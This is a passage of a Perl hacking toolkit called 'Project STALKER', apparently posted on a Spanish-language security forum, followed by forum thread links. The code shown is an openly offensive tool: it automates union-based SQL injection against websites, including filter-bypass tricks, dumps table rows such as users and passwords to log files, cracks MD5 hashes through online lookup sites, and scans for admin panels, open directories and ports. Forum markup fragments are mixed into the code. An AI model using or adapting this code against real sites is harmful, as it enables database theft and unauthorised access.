    650. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
    651. } else {
    652. print "\n";
    653. &reload;
    654. }
    655. }
    656. }
    657. } else {
    658. print "\n[-] mysql.user = ERROR\n\n";
    659. }
    660. }
    661.  
    662. sub dump {
    663. savefile($_[5].".txt","\n");
    664. my $page = $_[0];
    665. ($pass1,$pass2) = &bypass($_[4]);
    666. if ($page=~/(.*)hackman(.*)/){
    667. my $start = $1;
    668. my $end = $2;
    669. print "\n\n</li><li type="square"> Extracting values...\n\n";[/li][/list]
    670. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
    671. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
    672. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
    673. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
    674. $tota = $1;
    675. print "</li><li type="square"> Table : $_[3]\n";[/li][/list]
    676. print "</li><li type="square"> Length of the rows : $tota\n\n";[/li][/list]
    677. print "[$_[1]] [$_[2]]\n\n";
    678. savefile($_[5].".txt","[Table] : $_[3]");
    679. savefile($_[5].".txt","</li><li type="square"> Length of the rows: $tota\n");[/li][/list]
    680. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
    681. for my $limit(0..$tota) {
    682. chomp $limit;
    683. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
    684. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
    685. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
    686. print "[$_[1]] : $1   [$_[2]] : $2\n";
    687. } else {
    688. print "\n\n</li><li type="square"> Extracting Finish\n\n"; [/li][/list]
    689. &reload;
    690. }
    691. }
    692. } else {
    693. print "[-] Not Found any DATA\n\n";
    694. }}}
    695.  
    696. sub bypass {
    697. if ($_[0] eq "/*") { return ("/**/","/*"); }
    698. elsif ($_[0] eq "%20") { return ("%20","%00"); }
    699. else {return ("+","--");}}
    700.  
    701. sub ascii {
    702. return join ',',unpack "U*",$_[0];
    703. }
    704.  
    705. sub base {
    706. $re = encode_base64($_[0]);
    707. chomp $re;
    708. return $re;
    709. }
    710.  
    711. sub base_de {
    712. $re = decode_base64($_[0]);
    713. chomp $re;
    714. return $re;
    715. }
    716.  
    717.  
    718. sub download {
    719. if ($nave->mirror($_[0],$_[1])) {
    720. if (-f $_[1]) {
    721. return true;
    722. }}}
    723.  
    724.  
    725. sub hex_en {
    726. my $string = $_[0];
    727. $hex = '0x';
    728. for (split //,$string) {
    729. $hex .= sprintf "%x", ord;
    730. }
    731. return $hex;
    732. }
    733.  
    734. sub hex_de {
    735. my $text = shift;
    736. $text =~ s/^0x//;
    737. $encode = join q[], map { chr hex } $text =~ /../g;
    738. return $encode;
    739. }
    740.  
    741. sub ascii_de {
    742. my $text = shift;
    743. $text = join q[], map { chr } split q[,],$text;
    744. return $text;
    745. }
    746.  
    747. sub getprocess {
    748.  
    749. my %procesos;
    750.  
    751. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
    752. my $dos = $uno->ConnectServer("","root\\cimv2");
    753.  
    754. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
    755. $procesos{$pro->{Caption}} = $pro->{ProcessId};
    756. }
    757. return %procesos;
    758. }
    759.  
    760. sub killprocess {
    761.  
    762. my ($numb,$pid) = @_;
    763.  
    764. if (Win32::Process::KillProcess($pid,$numb)) {
    765. return true;
    766. } else {
    767. return false;
    768. }
    769. }
    770.  
    771. sub getip {
    772. my $get = gethostbyname($_[0]);
    773. return inet_ntoa($get);
    774. }
    775.  
    776. sub crackit {
    777.  
    778. my $secret = $_[0];
    779.  
    780. print "</li><li type="square"> Cracking $_[0]\n\n";[/li][/list]
    781.  
    782. my %hash = (
    783.    
    784. 'http://passcracking.com/' => {
    785. 'tipo'  => 'post',
    786. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
    787. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
    788. },  
    789. 'http://md5.hashcracking.com/search.php?md5=' =>  {
    790. 'tipo' => 'get',
    791. 'regex' => 'Cleartext of $_[0] is (.*)',
    792. },
    793. 'http://www.bigtrapeze.com/md5/' =>  {
    794. 'tipo' => 'post',
    795. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
    796. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
    797. },
    798. 'http://opencrack.hashkiller.com/' =>  {
    799. 'tipo' => 'post',
    800. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
    801. 'regex' => qq(<\/div><div class="result">$_[0]<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.+)<br\/>),
    802. },
    803. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
    804. 'tipo' => 'post',
    805. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
    806. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
    807. },
    808. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
    809. 'tipo' => 'get',
    810. 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
    811. }
    812. );
    813.  
    814. for my $data(keys %hash) {
    815.  
    816. if ($hash{$data}{tipo} eq "get") {
    817. $code = toma($data.$_[0]);
    818. if ($code=~/$hash{$data}{regex}/ig) {
    819. print "\n</li><li type="square"> Decoded : ".$1."\n\n";[/li][/list]
    820. saveyes("logs/pass-found.txt",$secret.":".$1);
    821. }
    822. } else {
    823. $code = tomar($data,$hash{$data}{variables});
    824. if ($code=~/$hash{$data}{regex}/ig) {
    825. saveyes("logs/pass-found.txt",$secret.":".$1);
    826. }
    827. }
    828. }
    829. print "\n</li><li type="square"> Finish\n"; [/li][/list]
    830. }
    831.  
    832. sub ftp {
    833.  
    834. my ($ftp,$user,$pass) = @_;
    835.  
    836. if (my $socket = Net::FTP->new($ftp)) {
    837. if ($socket->login($user,$pass)) {
    838.  
    839. print "\n</li><li type="square"> Enter of the server FTP\n\n";[/li][/list]
    840.  
    841. menu:
    842.  
    843. print "\n\nftp>";
    844. chomp (my $cmd = <stdin>);
    845. print "\n\n";
    846.  
    847. if ($cmd=~/help/) {
    848. print q(
    849.  
    850. help : show information
    851. cd : change directory <dir>
    852. dir : list a directory
    853. mdkdir : create a directory <dir>
    854. rmdir : delete a directory <dir>
    855. pwd : directory  
    856. del : delete a file <file>
    857. rename : change name of the a file <file1> <file2>
    858. size : size of the a file <file>
    859. put : upload a file <file>
    860. get : download a file <file>
    861. cdup : change dir <dir>
    862. exit : ??
    863.  
    864.  
    865. );
    866. }
    867.  
    868. if ($cmd=~/dir/ig) {
    869. if (my @files = $socket->dir()) {
    870. for(@files) {
    871. print "</li><li type="square"> ".$_."\n";[/li][/list]
    872. }
    873. } else {
    874. print "\n\n[-] Error\n\n";
    875. }
    876. }
    877.  
    878. if ($cmd=~/pwd/ig) {
    879. print "</li><li type="square"> Path : ".$socket->pwd()."\n";[/li][/list]
    880. }
    881.  
    882. if ($cmd=~/cd (.*)/ig) {
    883. if ($socket->cwd($1)) {
    884. print "</li><li type="square"> Directory changed\n";[/li][/list]
    885. } else {
    886. print "\n\n[-] Error\n\n";
    887. }
    888. }
    889.  
    890. if ($cmd=~/cdup/ig) {
    891. if (my $dir = $socket->cdup()) {
    892. print "\n\n</li><li type="square"> Directory changed\n\n";[/li][/list]
    893. } else {
    894. print "\n\n[-] Error\n\n";
    895. }
    896. }
    897.  
    898. if ($cmd=~/del (.*)/ig) {
    899. if ($socket->delete($1)) {
    900. print "</li><li type="square"> File deleted\n";[/li][/list]
    901. } else {
    902. print "\n\n[-] Error\n\n";
    903. }
    904. }
    905.  
    906. if ($cmd=~/rename (.*) (.*)/ig) {
    907. if ($socket->rename($1,$2)) {
    908. print "</li><li type="square"> File Updated\n";[/li][/list]
    909. } else {
    910. print "\n\n[-] Error\n\n";
    911. }
    912. }
    913.  
    914. if ($cmd=~/mkdir (.*)/ig) {
    915. if ($socket->mkdir($1)) {
    916. print "\n\n</li><li type="square"> Directory created\n";[/li][/list]
    917. } else {
    918. print "\n\n[-] Error\n\n";
    919. }
    920. }
    921.  
    922. if ($cmd=~/rmdir (.*)/ig) {
    923. if ($socket->rmdir($1)) {
    924. print "\n\n</li><li type="square"> Directory deleted\n"; [/li][/list]
    925. } else {
    926. print "\n\n[-] Error\n\n";
    927. }
    928. }
    929.  
    930. if ($cmd=~/exit/ig) {
    931. next;
    932. }
    933.  
    934. if ($cmd=~/get (.*) (.*)/ig) {
    935. print "\n\n</li><li type="square"> Downloading file\n\n";[/li][/list]
    936. if ($socket->get($1,$2)) {
    937. print "</li><li type="square"> Download completed";[/li][/list]
    938. } else {
    939. print "\n\n[-] Error\n\n";
    940. }
    941. }
    942.  
    943. if ($cmd=~/put (.*) (.*)/ig) {
    944. print "\n\n</li><li type="square"> Uploading file\n\n";[/li][/list]
    945. if ($socket->put($1,$2)) {
    946. print "</li><li type="square"> Upload completed";[/li][/list]
    947. } else {
    948. print "\n\n[-] Error\n\n";
    949. }
    950. }
    951.  
    952. if ($cmd=~/quit/) {
    953. next;
    954. }
    955.  
    956. goto menu;
    957.  
    958. } else {
    959. print "\n[-] Failed the login\n\n";
    960. }
    961.  
    962. } else {
    963. print "\n\n[-] Error\n\n";
    964. }
    965.  
    966.  
    967.  
    968. }
    969.  
    970.  
    971. sub scanpaths {
    972.  
    973. my $urla = $_[0];
    974.  
    975. print "\n</li><li type="square"> Find paths in $urla\n\n\n";[/li][/list]
    976. my @urls = repes(get_links(toma($urla)));
    977. for $url(@urls) {
    978. my $web = $url;
    979. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
    980. if ($_[0] =~/$auth/ or $auth eq "") {
    981. if ($path=~/(.*)\/(.*)\.(.*)$/) {
    982. my $borrar = $2.".".$3;
    983. if ($web=~/(.*)$borrar/) {
    984. my $co = $1;
    985. unless ($co=~/$auth/) {
    986. $co = $urla.$co;
    987. }
    988. $code = toma($co);
    989. if ($code=~/Index Of/ig) {
    990. print "[Link] : ".$co."\n";
    991. saveyes("logs/paths-found.txt",$co);
    992. }}}}}
    993. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    994. }
    995.  
    996.  
    997. sub scanport {
    998.  
    999. my %ports = ("21"=>"ftp",
    1000. "22"=>"ssh",
    1001. "25"=>"smtp",
    1002. "80"=>"http",
    1003. "110"=>"pop3",
    1004. "3306"=>"mysql"
    1005. );
    1006.  
    1007.  
    1008. print "</li><li type="square"> Scanning $_[0]\n\n\n";[/li][/list]
    1009.  
    1010. for my $port(keys %ports) {
    1011.  
    1012. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
    1013. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
    1014. }
    1015. }
    1016. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    1017. }
    1018.  
    1019.  
    1020. sub scanpanel {
    1021. print "</li><li type="square"> Scanning $_[0]\n\n\n";[/li][/list]
    1022. for $path(@panels) {
    1023. $code = tomax($_[0]."/".$path);
    1024. if ($code->is_success) {
    1025. print "[Link] : ".$_[0]."/".$path."\n";
    1026. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
    1027. }
    1028. }
    1029. print "\n\n</li><li type="square"> Finish\n";[/li][/list]
    1030. }
    1031.  
    1032. sub google {
    1033. my($a,$b) = @_;
    1034. for ($pages=10;$pages<=$b;$pages=$pages+10) {
    1035. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
    1036. my @links = get_links($code);
    1037. for my $l(@links) {
    1038. if ($l =~/webcache.googleusercontent.com/) {
    1039. push(@url,$l);
    1040. }
    1041. }
    1042. }
    1043.  
    1044. for(@url) {
    1045. if ($_ =~/cache:(.*?)<img src="https://underc0de.org/foro/Smileys/default/sad.gif" alt="&#58;&#40;" title="Triste" class="smiley" />.*?)\+/) {
    1046. push(@founds,$2);
    1047. }
    1048. }
    1049.  
    1050. my @founds = repes(@founds);
    1051.  
    1052. return @founds;
    1053. }
    1054.  
    1055.  
    1056. sub sql {
    1057.  
    1058. my ($pass1,$pass2) = ("+","--");
    1059. my $page = shift;
    1060. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    1061. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    1062. print "</li><li type="square"> SQLI : $page\a\n";[/li][/list]
    1063. saveyes("logs/sql-logs.txt",$page);
    1064. }}
    1065.  
    1066. sub get_links {
    1067.  
    1068. my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
    1069. return @links;
    1070.  
    1071. sub agarrar {
    1072. my ($a,%b) = @_;
    1073. push(@links,values %b);
    1074. }
    1075.  
    1076. }
    1077.  
    1078. sub repes {
    1079. foreach $test(@_) {
    1080. push @limpio,$test unless $repe{$test}++;
    1081. }
    1082. return @limpio;
    1083. }
    1084.  
    1085. sub head {
    1086. cprint "\x0311"; #13
    1087. print "\n\n-- == Project STALKER == --\n\n";
    1088. cprint "\x030";
    1089. }
    1090.  
    1091. sub copyright {
    1092. cprint "\x0311"; #13
    1093. print"\n\n(C) Doddy Hackman 2011\n\n";
    1094. cprint "\x030";
    1095. }
    1096.  
    1097. sub toma {
    1098. return $nave->get($_[0])->content;
    1099. }
    1100.  
    1101. sub tomax {
    1102. return $nave->get($_[0]);
    1103. }
    1104.  
    1105. sub tomar {
    1106. my ($web,$var) = @_;
    1107. return $nave->post($web,[%{$var}])->content;
    1108. }
    1109.  
    1110.  
    1111. sub conectar {
    1112.  
    1113. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
    1114. Proto => "tcp",Timeout  => 5);
    1115.  
    1116. print $sockex $_[2]."\r\n";
    1117. $sockex->read($re,5000);
    1118. $sockex->close;
    1119. return $re."\r\n";
    1120. }
    1121.  
    1122.  
    1123. sub enter {
    1124.  
    1125. my ($host,$user,$pass) = @_;
    1126.  
    1127. print "</li><li type="square"> Connecting to the server\n";[/li][/list]
    1128.  
    1129. $info = "dbi:mysql::".$host.":3306";
    1130. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
    1131.  
    1132. print "\n</li><li type="square"> Enter in the database";[/li][/list]
    1133.  
    1134. while(1) {
    1135. print "\n\n\n</li><li type="square"> Query : ";[/li][/list]
    1136. chomp(my $ac = <stdin>);
    1137.  
    1138. if ($ac eq "exit") {
    1139. $enter->disconnect;
    1140. print "\n\n</li><li type="square"> Closing connection\n\n";[/li][/list]
    1141. last;
    1142. }
    1143.  
    1144. $re = $enter->prepare($ac);
    1145. $re->execute();
    1146. my $total = $re->rows();
    1147.  
    1148. my @columnas = @{$re->{NAME}};
    1149.  
    1150. if ($total eq "-1") {
    1151. print "\n\n[-] Query Error\n";
    1152. next;
    1153. } else {
    1154. print "\n\n</li><li type="square"> Result of the query\n";[/li][/list]
    1155. if ($total eq 0) {
    1156. print "\n\n</li><li type="square"> Not rows returned\n\n";[/li][/list]
    1157. } else {
    1158. print "\n\n</li><li type="square"> Rows returned : ".$total."\n\n\n";[/li][/list]
    1159. for(@columnas) {
    1160. print $_."\t\t";
    1161. }
    1162. print "\n\n";
    1163. while (@row = $re->fetchrow_array) {
    1164. for(@row) {
    1165. print $_."\t\t";
    1166. }
    1167. print "\n";
    1168. }}}}
    1169. } else {
    1170. print "\n[-] Error connecting\n";
    1171. }}
    1172.  
    1173. sub saveyes {
    1174. open (SAVE,">>".$_[0]);
    1175. print SAVE $_[1]."\n";
    1176. close SAVE;
    1177. }
    1178.  
    1179. sub savefile {
    1180. open (SAVE,">>logs/webs/".$_[0]);
    1181. print SAVE $_[1]."\n";
    1182. close SAVE;
    1183. }
    1184.  
    1185. sub coleccionar {
    1186. opendir DIR,$_[0];
    1187. my @archivos = readdir DIR;
    1188. close DIR;
    1189. return @archivos;
    1190. }
    1191.  
    1192. sub helpme {
    1193.  
    1194. cprint "\x0310"; #13
    1195.  
    1196. Commands :
    1197.  
    1198.  
    1199. getinfo
    1200. getip <host>
    1201. getlink <page>
    1202. getprocess
    1203. killprocess <name process> <pid process>
    1204. conec <host> <port> <command>  
    1205. allow <host>
    1206. paths <page>
    1207. encodehex <text>
    1208. decodehex <text>
    1209. encodeascii <text>
    1210. decodeascii <text>
    1211. encodebase <text>
    1212. decodebase <text>
    1213. scanport <host>
    1214. panel <page>
    1215. getpass <hash>
    1216. kobra <page>
    1217. ftp <host> <user> <pass>
    1218. mysql <host> <user> <pass>
    1219. navegator
    1220. scangoogle
    1221. help
    1222.  
    1223. );
    1224. cprint "\x030";
    1225. }
    1226.  
    1227. #
    1228. #  The End ?
    1229. #
    1230.  

    Eso es todo
« Última modificación: Marzo 14, 2015, 10:16:20 am por Expermicid »

 

Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 5331
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 3474
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 2606
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 3017
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 2445
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear